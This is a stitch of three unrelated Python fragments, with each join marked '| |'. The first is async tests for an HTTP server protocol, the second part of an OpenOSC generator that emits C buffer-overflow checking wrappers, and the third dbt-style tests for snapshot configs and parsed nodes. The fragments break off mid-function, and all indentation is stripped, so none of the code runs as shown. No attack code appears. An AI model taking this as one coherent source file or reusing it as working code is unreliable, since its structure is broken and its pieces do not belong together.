protocol.connection_made(transport_mock)
transport_mock._closing = True
protocol.connection_lost(None)
@helper.run_async_test
async def test_simple_request(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
async def aiter_requests():
count = 0
async for reader in protocol:
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.OK)
writer.finish()
count += 1
assert count == 1
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
assert not tsk.done()
protocol.data_received(b"GET / HTTP/1.1\r\nConnection: Close\r\n\r\n")
await tsk
assert protocol.eof_received() is True
assert transport_mock._closing is True
protocol.connection_lost(None)
data = transport_mock._pop_stored_data()
helper.assert_initial_bytes(
data,
b"HTTP/1.1 200 OK",
b"Server: %(self_ver_bytes)s",
b"Connection: Close",
b"Transfer-Encoding: Chunked",
)
assert data.split(b"\r\n\r\n", 1)[1] == b"0\r\n\r\n"
@helper.run_async_test
async def test_simple_request_10(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
async def aiter_requests():
count = 0
async for reader in protocol:
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.OK)
writer.finish()
count += 1
assert count == 1
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
assert not tsk.done()
protocol.data_received(b"GET / HTTP/1.0\r\n\r\n")
await tsk
assert protocol.eof_received() is True
assert transport_mock._closing is True
protocol.connection_lost(None)
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.0 200 OK",
b"Server: %(self_ver_bytes)s",
b"Connection: Close",
)
@helper.run_async_test
async def test_chunked_request(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
async def aiter_requests():
count = 0
async for reader in protocol:
assert await reader.read(9, exactly=True) == b"123456789"
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.OK)
writer.finish()
count += 1
assert count == 1
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
assert not tsk.done()
protocol.data_received(
b"GET / HTTP/1.1\r\nTransfer-Encoding: Chunked\r\n"
b"Connection: Close\r\n\r\n"
b"5\r\n12345\r\n4\r\n6789\r\n0\r\n\r\n"
)
await tsk
assert protocol.eof_received() is True
assert transport_mock._closing is True
protocol.connection_lost(None)
data = transport_mock._pop_stored_data()
helper.assert_initial_bytes(
data,
b"HTTP/1.1 200 OK",
b"Server: %(self_ver_bytes)s",
b"Connection: Close",
b"Transfer-Encoding: Chunked",
)
assert data.split(b"\r\n\r\n", 1)[1] == b"0\r\n\r\n"
@helper.run_async_test
async def test_simple_response_with_chunked_body(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
data = os.urandom(20)
async def aiter_requests():
count = 0
async for reader in protocol:
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.OK)
writer.finish(data)
count += 1
assert count == 1
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
assert not tsk.done()
protocol.data_received(b"GET / HTTP/1.1\r\nConnection: Close\r\n\r\n")
await tsk
assert protocol.eof_received() is True
assert transport_mock._closing is True
protocol.connection_lost(None)
final_data = transport_mock._pop_stored_data()
helper.assert_initial_bytes(
final_data,
b"HTTP/1.1 200 OK",
b"Server: %(self_ver_bytes)s",
b"Connection: Close",
b"Transfer-Encoding: Chunked",
)
assert (
final_data.split(b"\r\n\r\n", 1)[1]
== b"14\r\n" + data + b"\r\n0\r\n\r\n"
)
@helper.run_async_test
async def test_simple_response_with_content_length(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
data = os.urandom(20)
async def aiter_requests():
count = 0
async for reader in protocol:
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(
HttpStatusCode.OK, headers={"content-length": "20"}
)
writer.finish(data)
count += 1
assert count == 1
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
assert not tsk.done()
protocol.data_received(b"GET / HTTP/1.1\r\nConnection: Close\r\n\r\n")
await tsk
assert protocol.eof_received() is True
assert transport_mock._closing is True
protocol.connection_lost(None)
final_data = transport_mock._pop_stored_data()
helper.assert_initial_bytes(
final_data,
b"HTTP/1.1 200 OK",
b"Server: %(self_ver_bytes)s",
b"Connection: Close",
b"Content-Length: 20",
)
assert final_data.split(b"\r\n\r\n", 1)[1] == data
@helper.run_async_test
async def test_keep_alive(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(
b"GET / HTTP/1.1\r\n\r\n" b"GET / HTTP/1.1\r\n\r\n"
)
async def aiter_requests():
count = 0
async for reader in protocol:
assert reader.initial.uri == "/"
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.NO_CONTENT)
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.1 204 No Content",
b"Server: %(self_ver_bytes)s",
)
writer.finish()
assert b"".join(transport_mock._data_chunks) == b""
count += 1
assert count == 2
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
if tsk.done():
raise RuntimeError(tsk.result())
assert protocol.eof_received() is True
await tsk
transport_mock._closing = True
protocol.connection_lost(None)
with pytest.raises(StopAsyncIteration):
await protocol.__aiter__().__anext__()
@helper.run_async_test
async def test_keep_alive_10(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(
b"GET / HTTP/1.0\r\nConnection: Keep-Alive\r\n\r\n"
b"GET / HTTP/1.0\r\nConnection: Keep-Alive\r\n\r\n"
)
async def aiter_requests():
count = 0
async for reader in protocol:
assert reader.initial.uri == "/"
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.NO_CONTENT)
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.0 204 No Content",
b"Connection: Keep-Alive",
b"Server: %(self_ver_bytes)s",
)
writer.finish()
assert b"".join(transport_mock._data_chunks) == b""
count += 1
assert count == 2
tsk = helper.create_task(aiter_requests())
await asyncio.sleep(0)
if tsk.done():
raise RuntimeError(tsk.result())
assert protocol.eof_received() is True
await tsk
transport_mock._closing = True
protocol.connection_lost(None)
with pytest.raises(StopAsyncIteration):
await protocol.__aiter__().__anext__()
@helper.run_async_test
async def test_response_with_endless_body(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(b"GET / HTTP/1.0\r\n\r\n")
async for reader in protocol:
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(HttpStatusCode.OK)
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.0 200 OK",
b"Server: %(self_ver_bytes)s",
b"Connection: Close",
)
for _ in range(0, 5):
data = os.urandom(1024)
writer.write(data)
assert b"".join(transport_mock._data_chunks) == data
transport_mock._data_chunks.clear()
writer.finish()
assert b"".join(transport_mock._data_chunks) == b""
assert protocol.eof_received() is True
assert transport_mock._closing is True
protocol.connection_lost(None)
@helper.run_async_test
async def test_upgrade(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(
b"GET / HTTP/1.1\r\nConnection: Upgrade\r\n"
b"Upgrade: WebSocket\r\n\r\n"
)
count = 0
async for reader in protocol:
count += 1
assert reader.initial.headers["connection"] == "Upgrade"
assert reader.initial.headers["upgrade"] == "WebSocket"
writer = reader.write_response(
HttpStatusCode.SWITCHING_PROTOCOLS,
headers={"Connection": "Upgrade", "Upgrade": "WebSocket"},
)
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.1 101 Switching Protocols",
b"Server: %(self_ver_bytes)s",
b"Upgrade: WebSocket",
b"Connection: Upgrade",
)
for _i in range(0, 5):
for _j in range(0, 5):
data = os.urandom(1024)
protocol.data_received(data)
assert await reader.read(4096) == data
for _k in range(0, 5):
data = os.urandom(1024)
writer.write(data)
assert b"".join(transport_mock._data_chunks) == data
transport_mock._data_chunks.clear()
writer.finish()
assert protocol.eof_received() is True
with pytest.raises(ReadFinishedError):
await reader.read()
transport_mock.close()
protocol.connection_lost(None)
assert count == 1
@helper.run_async_test
async def test_close_after_finished(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(
b"GET / HTTP/1.1\r\nConnection: Keep-Alive\r\n\r\n"
)
count = 0
async for reader in protocol:
count += 1
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(
HttpStatusCode.NO_CONTENT, headers={"connection": "Keep-Alive"}
)
writer.finish()
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.1 204 No Content",
b"Server: %(self_ver_bytes)s",
b"Connection: Keep-Alive",
)
protocol.close()
assert transport_mock._closing is True
assert protocol.eof_received() is True
protocol.connection_lost(None)
assert count == 1
@helper.run_async_test
async def test_close_before_finished(self):
protocol = HttpServerProtocol()
transport_mock = TransportMock()
protocol.connection_made(transport_mock)
protocol.data_received(
b"GET / HTTP/1.1\r\nConnection: Keep-Alive\r\n\r\n"
)
async def wait_closed():
await protocol.wait_closed()
count = 0
async for reader in protocol:
count += 1
protocol.close()
tsk = helper.create_task(wait_closed())
await asyncio.sleep(0)
assert tsk.done() is False
assert transport_mock._closing is False
with pytest.raises(ReadFinishedError):
await reader.read()
writer = reader.write_response(
HttpStatusCode.NO_CONTENT, headers={"connection": "Keep-Alive"}
)
writer.finish()
helper.assert_initial_bytes(
transport_mock._pop_stored_data(),
b"HTTP/1.1 204 No Content",
b"Server: %(self_ver_bytes)s",
b"Connection: Keep-Alive",
)
assert count == 1
assert transport_mock._closing is True
assert protocol.eof_received() is True
assert tsk.done() is False
protocol.connection_lost(None)
await tsk
| |
+ ')'
like_which = "like_memcpy"
code2 = todo_code_template
if dest_param:
if copylen:
code += '\n{\n'
code += ' unsigned int osc_abort = OSC_DEF_ABORT_STATE;\n\n'
code += ' if (' + copylen + ' > dest_len) {\n'
code += ' if (osc_log) {\n'
code += ' danger_error("' + funcname + '", dest_len, ' + copylen + ');\n'
code += ' }\n'
code += ' osc_get_config(&osc_abort);\n'
code += ' if (osc_abort) {\n'
code += ' abort();\n'
code += ' }\n'
code += ' if (osc_truncate) {\n'
code += ' ' + copylen + ' = dest_len;\n'
code += ' }\n'
code += ' }\n'
#code += '#undef ' + funcname + '\n'
#code += ' return (' + funcname + '(' + comma_params + '));\n'
#code += '}\n\n'
else:
code += code2
else:
code += code2
if dest_param:
if copylen and src_param:
like_which = "like_memcpy"
#code2 = generate_code_like_memcpy(funcname, copylen)
elif copylen and not src_param:
like_which = "like_memset"
#code2 = generate_code_like_memset(funcname, copylen)
elif not copylen and src_param:
like_which = "like_strcpy"
else:
like_which = "like_dest_only"
else:
like_which = "like_other"
if src_param and copylen:
like_which = "like_strnlen"
elif "print" in funcname:
like_which = "vprintf_like"
#code += code2
## Add support for calling glibc print_chk functions
if glibc_chk_funcname in glibc_print_chk_prototype_db:
glibc_chk_prototype = glibc_print_chk_prototype_db[glibc_chk_funcname]
(glibc_retval, glibc_funcname, glibc_params) = get_func_params_from_prototype(glibc_chk_prototype)
flag_index = find_flag_param_index_in_params(glibc_params)
new_comma_params = insert_glibc_print_chk_flag_with_destlen(params, flag_index)
code += '\n return (' + glibc_funcname + '(' + new_comma_params + '));\n}\n\n'
else:
code += '\n return (' + funcname + '(' + comma_params + '));\n}\n\n'
print(code)
openosc_write_filename("openosc_fortify_map.c", code)
print(HDR2)
return like_which
def openosc_write_filename(filename, code, position=''):
'''
Write generated code to a file. It appends to the end of the file, so writing order is important.
:param filename: the file name to write the code.
:param code: the code as a long string.
:param position: file_start/file_end
:returns None
'''
if not filename:
return
with open(filename, 'a') as f:
if position == "file_start":
f.write( get_openosc_h_file_top_code(filename) )
f.write(code + '\n')
if position == "file_end":
f.write( get_openosc_h_file_bottom_code(filename) )
def openosc_write_file(afile, code, filename='', position=''):
if afile:
if filename and position == "file_start":
afile.write('\n/* Beginning of ' + filename + ' */\n\n')
afile.write( get_openosc_h_file_top_code(filename) )
afile.write(code + "\n")
if filename and position == "file_end":
afile.write( get_openosc_h_file_bottom_code(filename) )
afile.write('\n/* End of ' + filename + ' */\n\n')
########## Function Prototype Analysis Functions ###########
memcpy_prototype = 'void *memcpy(void *dest, const void *src, size_t n);'
strncpy_prototype = 'char *strncpy(char *dest, const char *src, size_t n);'
vsnprintf_prototype = 'int vsnprintf(char *str, size_t size, const char *format, va_list ap);'
swprintf_prototype = '''int swprintf(wchar_t *wcs, size_t maxlen,
const wchar_t *format, ...);'''
def get_func_name_from_prototype(prototype):
'''
Get the function name from a function prototype string.
:param prototype: function prototype string
:returns the function name.
'''
loc1 = prototype.find('(')
newproto = prototype[:loc1].rstrip()
loc = newproto.rfind('*')
if loc < 0:
loc = newproto.rfind(' ')
funcname = newproto[(loc + 1):].strip()
return funcname
def get_func_params_from_prototype(prototype):
'''
Get the whole string of function parameters from a function prototype string.
:param prototype: function prototype string
:returns the whole string of function parameters like "void *dest, const void *src, size_t n" for memcpy.
'''
loc1 = prototype.find('(')
loc2 = prototype.find(')')
params = prototype[(loc1 +1):loc2]
newproto = prototype[:loc1].rstrip()
loc = newproto.rfind('*')
if loc < 0:
loc = newproto.rfind(' ')
funcname = newproto[(loc + 1):].strip()
retval = newproto[:(loc + 1)]
#print((retval, funcname, params))
return (retval, funcname, params)
def get_param_list_from_params_string(params):
'''
Convert the string of function parameters to a list of "param_type param_name".
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns a list like ["void *dest", "const void *src", "size_t n"].
'''
tokens = params.split(",")
return [token.strip() for token in tokens]
def get_type_name_from_param(param):
'''
Return (param_type, param_name) tuple for a single function parameter string of "type name".
'''
param = param.strip()
loc = param.rfind('*')
if loc < 0:
loc = param.rfind(' ')
param_type = param[:(loc + 1)].strip()
param_name = param[(loc + 1):].strip()
return (param_type, param_name)
def get_param_names_from_params(params):
'''
Convert the string of function parameters to a list of parameter names only.
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns a list like ["dest", "src", "n"].
'''
names = []
param_list = get_param_list_from_params_string(params)
for param in param_list:
(param_type, param_name) = get_type_name_from_param(param)
names.append(param_name)
return names
def get_comma_joined_param_names(params):
'''
Convert the string of function parameters to a new string of comma-joined parameter names only.
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns a new string like "dest, src, n" for memcpy.
'''
names = get_param_names_from_params(params)
return ', '.join(names)
def analyze_func_params(params):
'''
Anaylze the string of function parameters and find (dst,src,copylen) parameters.
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns the tuple of (dst_type, dst_param, len_param, src_type, src_param)
'''
(dest_type, dest_param) = get_dest_param(params)
(src_type, src_param) = get_src_param(params)
len_param = get_copylen_param(params)
#print("Dest param type: " + dest_type + "Dest param: " + dest_param + " Length: " + len_param + " Src param type: " + src_type + " Src param: " + src_param)
if src_param == dest_param:
src_param = ""
src_type = ""
return (dest_type, dest_param, len_param, src_type, src_param)
def get_copylen_param(params):
'''
Find the copy length param from the string of function parameters.
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns the copy length parameter like n for memcpy.
'''
token_list = []
tokens = params.split(',')
for token in tokens:
token = token.strip()
#print(token)
if token == "...":
continue
(param_type, param_name) = get_type_name_from_param(token)
if '*' in param_type or "const " in param_type or "[]" in param_name:
continue
if param_name == "n" or param_name == "len":
return param_name
if "size" in param_type or "size" == param_name:
token_list.append(token)
#print("All the candidate parameters for copy length or buffer size are:")
#print(token_list)
if token_list:
(param_type, param_name) = get_type_name_from_param(token_list[0])
return param_name
return ""
def get_dest_param(params):
'''
Find the destination buffer param from the string of function parameters.
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns (dest_param_type, dest_param_name) like ("void *", "dest")
'''
token_list = []
tokens = params.split(',')
for token in tokens:
token = token.strip()
#print(token)
if token == "...":
continue
(param_type, param_name) = get_type_name_from_param(token)
if '*' not in param_type or "const " in param_type or "src" in param_name or "FILE" in param_type or "**" in param_type:
continue
if param_name == "dest" or param_name == "dst" or param_name == "destination":
return (param_type, param_name)
token_list.append(token)
#print("All the candidate parameters for destinationn param are:")
#print(token_list)
if token_list:
(param_type, param_name) = get_type_name_from_param(token_list[0])
return (param_type, param_name)
return ("", "")
def get_src_param(params):
'''
Find the source buffer param from the string of function parameters.
:param params: The whole parameter string like "void *dest, const void *src, size_t n" for memcpy
:returns (src_param_type, src_param_name) like ("const void *", "src")
'''
token_list = []
tokens = params.split(',')
for token in tokens:
token = token.strip()
#print(token)
if token == "...":
continue
(param_type, param_name) = get_type_name_from_param(token)
if '*' not in param_type or "format" in param_name or "dest" in param_name or "dst" in param_name or "FILE" in param_type:
continue
if param_name == "src" or param_name == "source":
return (param_type, param_name)
token_list.append(token)
#print("All the candidate parameters for source param are:")
#print(token_list)
if token_list:
(param_type, param_name) = get_type_name_from_param(token_list[0])
return (param_type, param_name)
return ("", "")
def get_man_section_func_output(func, section):
'''
Return output of "man <section> func" command.
:param func: function name
:param section: which section to search for manual
:returns the command output as a string.
'''
cmd = 'man ' + section + ' ' + func + ' | cat '
# print(cmd)
output = subprocess.check_output(cmd, shell=True, stderr=open(os.devnull, 'w'))
#print(output)
#files = output.splitlines()
return output
def get_man_func_output(func):
'''
Return output of "man 2 func" or "man 3 func".
:param func: function name
:returns the command output as a string.
'''
output = get_man_section_func_output(func, "2")
if output:
return output
return get_man_section_func_output(func, "3")
def | |
'quoting': {},
'tags': [],
'vars': {},
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
'unique_key': 'id',
'extra': 'even more',
'strategy': 'check',
'check_cols': ['a', 'b'],
}
@pytest.fixture
def complex_set_snapshot_config_object():
cfg = CheckSnapshotConfig(
column_types={'a': 'text'},
materialized='snapshot',
post_hook=[Hook(sql='insert into blah(a, b) select "1", 1')],
strategy=SnapshotStrategy.Check,
check_cols=['a', 'b'],
target_database='some_snapshot_db',
target_schema='some_snapshot_schema',
unique_key='id',
)
cfg._extra['extra'] = 'even more'
return cfg
def test_basic_snapshot_config(basic_check_snapshot_config_dict, basic_check_snapshot_config_object):
cfg_dict = basic_check_snapshot_config_dict
cfg = basic_check_snapshot_config_object
assert_symmetric(cfg, cfg_dict, CheckSnapshotConfig)
pickle.loads(pickle.dumps(cfg))
def test_complex_snapshot_config(complex_set_snapshot_config_dict, complex_set_snapshot_config_object):
cfg_dict = complex_set_snapshot_config_dict
cfg = complex_set_snapshot_config_object
assert_symmetric(cfg, cfg_dict)
pickle.loads(pickle.dumps(cfg))
def test_invalid_check_wrong_strategy(basic_check_snapshot_config_dict):
wrong_strategy = basic_check_snapshot_config_dict
wrong_strategy['strategy'] = 'timestamp'
assert_fails_validation(wrong_strategy, CheckSnapshotConfig)
def test_invalid_missing_check_cols(basic_check_snapshot_config_dict):
wrong_fields = basic_check_snapshot_config_dict
del wrong_fields['check_cols']
with pytest.raises(ValidationError, match=r"'check_cols' is a required property"):
CheckSnapshotConfig.from_dict(wrong_fields)
def test_invalid_check_value(basic_check_snapshot_config_dict):
invalid_check_type = basic_check_snapshot_config_dict
invalid_check_type['check_cols'] = 'some'
assert_fails_validation(invalid_check_type, CheckSnapshotConfig)
@pytest.fixture
def basic_timestamp_snapshot_dict():
return {
'name': 'foo',
'root_path': '/root/',
'resource_type': str(NodeType.Snapshot),
'path': '/root/x/path.sql',
'original_file_path': '/root/path.sql',
'package_name': 'test',
'raw_sql': 'select * from wherever',
'unique_id': 'model.test.foo',
'fqn': ['test', 'models', 'foo'],
'refs': [],
'sources': [],
'depends_on': {'macros': [], 'nodes': []},
'deferred': False,
'database': 'test_db',
'description': '',
'schema': 'test_schema',
'alias': 'bar',
'tags': [],
'config': {
'column_types': {},
'enabled': True,
'materialized': 'snapshot',
'persist_docs': {},
'post-hook': [],
'pre-hook': [],
'quoting': {},
'tags': [],
'vars': {},
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
'unique_key': 'id',
'strategy': 'timestamp',
'updated_at': 'last_update',
},
'docs': {'show': True},
'columns': {},
'meta': {},
'checksum': {'name': 'sha256', 'checksum': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'},
'unrendered_config': {
'strategy': 'timestamp',
'unique_key': 'id',
'updated_at': 'last_update',
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
},
}
@pytest.fixture
def basic_timestamp_snapshot_object():
return ParsedSnapshotNode(
package_name='test',
root_path='/root/',
path='/root/x/path.sql',
original_file_path='/root/path.sql',
raw_sql='select * from wherever',
name='foo',
resource_type=NodeType.Snapshot,
unique_id='model.test.foo',
fqn=['test', 'models', 'foo'],
refs=[],
sources=[],
depends_on=DependsOn(),
description='',
database='test_db',
schema='test_schema',
alias='bar',
tags=[],
config=TimestampSnapshotConfig(
strategy=SnapshotStrategy.Timestamp,
unique_key='id',
updated_at='last_update',
target_database='some_snapshot_db',
target_schema='some_snapshot_schema',
),
checksum=FileHash.from_contents(''),
unrendered_config={
'strategy': 'timestamp',
'unique_key': 'id',
'updated_at': 'last_update',
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
},
)
@pytest.fixture
def basic_intermediate_timestamp_snapshot_object():
cfg = EmptySnapshotConfig()
cfg._extra.update({
'strategy': 'timestamp',
'unique_key': 'id',
'updated_at': 'last_update',
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
})
return IntermediateSnapshotNode(
package_name='test',
root_path='/root/',
path='/root/x/path.sql',
original_file_path='/root/path.sql',
raw_sql='select * from wherever',
name='foo',
resource_type=NodeType.Snapshot,
unique_id='model.test.foo',
fqn=['test', 'models', 'foo'],
refs=[],
sources=[],
depends_on=DependsOn(),
description='',
database='test_db',
schema='test_schema',
alias='bar',
tags=[],
config=cfg,
checksum=FileHash.from_contents(''),
unrendered_config={
'strategy': 'timestamp',
'unique_key': 'id',
'updated_at': 'last_update',
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
},
)
@pytest.fixture
def basic_check_snapshot_dict():
return {
'name': 'foo',
'root_path': '/root/',
'resource_type': str(NodeType.Snapshot),
'path': '/root/x/path.sql',
'original_file_path': '/root/path.sql',
'package_name': 'test',
'raw_sql': 'select * from wherever',
'unique_id': 'model.test.foo',
'fqn': ['test', 'models', 'foo'],
'refs': [],
'sources': [],
'depends_on': {'macros': [], 'nodes': []},
'database': 'test_db',
'deferred': False,
'description': '',
'schema': 'test_schema',
'alias': 'bar',
'tags': [],
'config': {
'column_types': {},
'enabled': True,
'materialized': 'snapshot',
'persist_docs': {},
'post-hook': [],
'pre-hook': [],
'quoting': {},
'tags': [],
'vars': {},
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
'unique_key': 'id',
'strategy': 'check',
'check_cols': 'all',
},
'docs': {'show': True},
'columns': {},
'meta': {},
'checksum': {'name': 'sha256', 'checksum': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'},
'unrendered_config': {
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
'unique_key': 'id',
'strategy': 'check',
'check_cols': 'all',
},
}
@pytest.fixture
def basic_check_snapshot_object():
return ParsedSnapshotNode(
package_name='test',
root_path='/root/',
path='/root/x/path.sql',
original_file_path='/root/path.sql',
raw_sql='select * from wherever',
name='foo',
resource_type=NodeType.Snapshot,
unique_id='model.test.foo',
fqn=['test', 'models', 'foo'],
refs=[],
sources=[],
depends_on=DependsOn(),
description='',
database='test_db',
schema='test_schema',
alias='bar',
tags=[],
config=CheckSnapshotConfig(
strategy=SnapshotStrategy.Check,
unique_key='id',
check_cols=All.All,
target_database='some_snapshot_db',
target_schema='some_snapshot_schema',
),
checksum=FileHash.from_contents(''),
unrendered_config={
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
'unique_key': 'id',
'strategy': 'check',
'check_cols': 'all',
},
)
@pytest.fixture
def basic_intermedaite_check_snapshot_object():
cfg = EmptySnapshotConfig()
cfg._extra.update({
'unique_key': 'id',
'strategy': 'check',
'check_cols': 'all',
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
})
return IntermediateSnapshotNode(
package_name='test',
root_path='/root/',
path='/root/x/path.sql',
original_file_path='/root/path.sql',
raw_sql='select * from wherever',
name='foo',
resource_type=NodeType.Snapshot,
unique_id='model.test.foo',
fqn=['test', 'models', 'foo'],
refs=[],
sources=[],
depends_on=DependsOn(),
description='',
database='test_db',
schema='test_schema',
alias='bar',
tags=[],
config=cfg,
checksum=FileHash.from_contents(''),
unrendered_config={
'target_database': 'some_snapshot_db',
'target_schema': 'some_snapshot_schema',
'unique_key': 'id',
'strategy': 'check',
'check_cols': 'all',
},
)
def test_timestamp_snapshot_ok(basic_timestamp_snapshot_dict, basic_timestamp_snapshot_object, basic_intermediate_timestamp_snapshot_object):
node_dict = basic_timestamp_snapshot_dict
node = basic_timestamp_snapshot_object
inter = basic_intermediate_timestamp_snapshot_object
assert_symmetric(node, node_dict, ParsedSnapshotNode)
assert_symmetric(inter, node_dict, IntermediateSnapshotNode)
assert ParsedSnapshotNode.from_dict(inter.to_dict()) == node
assert node.is_refable is True
assert node.is_ephemeral is False
pickle.loads(pickle.dumps(node))
def test_check_snapshot_ok(basic_check_snapshot_dict, basic_check_snapshot_object, basic_intermedaite_check_snapshot_object):
node_dict = basic_check_snapshot_dict
node = basic_check_snapshot_object
inter = basic_intermedaite_check_snapshot_object
assert_symmetric(node, node_dict, ParsedSnapshotNode)
assert_symmetric(inter, node_dict, IntermediateSnapshotNode)
assert ParsedSnapshotNode.from_dict(inter.to_dict()) == node
assert node.is_refable is True
assert node.is_ephemeral is False
pickle.loads(pickle.dumps(node))
def test_invalid_snapshot_bad_resource_type(basic_timestamp_snapshot_dict):
bad_resource_type = basic_timestamp_snapshot_dict
bad_resource_type['resource_type'] = str(NodeType.Model)
assert_fails_validation(bad_resource_type, ParsedSnapshotNode)
def test_basic_parsed_node_patch(basic_parsed_model_patch_object, basic_parsed_model_patch_dict):
assert_symmetric(basic_parsed_model_patch_object, basic_parsed_model_patch_dict)
@pytest.fixture
def populated_parsed_node_patch_dict():
return {
'name': 'foo',
'description': 'The foo model',
'original_file_path': '/path/to/schema.yml',
'columns': {
'a': {
'name': 'a',
'description': 'a text field',
'meta': {},
'tags': [],
},
},
'docs': {'show': False},
'meta': {'key': ['value']},
'yaml_key': 'models',
'package_name': 'test',
}
@pytest.fixture
def populated_parsed_node_patch_object():
return ParsedNodePatch(
name='foo',
description='The foo model',
original_file_path='/path/to/schema.yml',
columns={'a': ColumnInfo(name='a', description='a text field', meta={})},
meta={'key': ['value']},
yaml_key='models',
package_name='test',
docs=Docs(show=False),
)
def test_populated_parsed_node_patch(populated_parsed_node_patch_dict, populated_parsed_node_patch_object):
assert_symmetric(populated_parsed_node_patch_object, populated_parsed_node_patch_dict)
class TestParsedMacro(ContractTestCase):
ContractType = ParsedMacro
def _ok_dict(self):
return {
'name': 'foo',
'path': '/root/path.sql',
'original_file_path': '/root/path.sql',
'package_name': 'test',
'macro_sql': '{% macro foo() %}select 1 as id{% endmacro %}',
'root_path': '/root/',
'resource_type': 'macro',
'unique_id': 'macro.test.foo',
'tags': [],
'depends_on': {'macros': []},
'meta': {},
'description': 'my macro description',
'docs': {'show': True},
'arguments': [],
}
def test_ok(self):
macro_dict = self._ok_dict()
macro = self.ContractType(
name='foo',
path='/root/path.sql',
original_file_path='/root/path.sql',
package_name='test',
macro_sql='{% macro foo() %}select 1 as id{% endmacro %}',
root_path='/root/',
resource_type=NodeType.Macro,
unique_id='macro.test.foo',
tags=[],
depends_on=MacroDependsOn(),
meta={},
description='my macro description',
arguments=[],
)
self.assert_symmetric(macro, macro_dict)
self.assertEqual(macro.local_vars(), {})
pickle.loads(pickle.dumps(macro))
def test_invalid_missing_unique_id(self):
bad_missing_uid = self._ok_dict()
del bad_missing_uid['unique_id']
self.assert_fails_validation(bad_missing_uid)
def test_invalid_extra_field(self):
bad_extra_field = self._ok_dict()
bad_extra_field['extra'] = 'too many fields'
self.assert_fails_validation(bad_extra_field)
class TestParsedDocumentation(ContractTestCase):
ContractType = ParsedDocumentation
def _ok_dict(self):
return {
'block_contents': 'some doc contents',
'name': 'foo',
'original_file_path': '/root/docs/doc.md',
'package_name': 'test',
'path': '/root/docs',
'root_path': '/root',
'unique_id': 'test.foo',
}
def test_ok(self):
doc_dict = self._ok_dict()
doc = self.ContractType(
package_name='test',
root_path='/root',
path='/root/docs',
original_file_path='/root/docs/doc.md',
name='foo',
unique_id='test.foo',
block_contents='some doc contents'
)
self.assert_symmetric(doc, doc_dict)
pickle.loads(pickle.dumps(doc))
def test_invalid_missing(self):
bad_missing_contents = self._ok_dict()
del bad_missing_contents['block_contents']
self.assert_fails_validation(bad_missing_contents)
def test_invalid_extra(self):
bad_extra_field = self._ok_dict()
bad_extra_field['extra'] = 'more'
self.assert_fails_validation(bad_extra_field)
@pytest.fixture
def minimum_parsed_source_definition_dict():
return {
'package_name': 'test',
'root_path': '/root',
'path': '/root/models/sources.yml',
'original_file_path': '/root/models/sources.yml',
'database': 'some_db',
'schema': 'some_schema',
'fqn': ['test', 'source', 'my_source', 'my_source_table'],
'source_name': 'my_source',
'name': 'my_source_table',
'source_description': 'my source description',
'loader': 'stitch',
'identifier': 'my_source_table',
'resource_type': str(NodeType.Source),
'unique_id': 'test.source.my_source.my_source_table',
}
@pytest.fixture
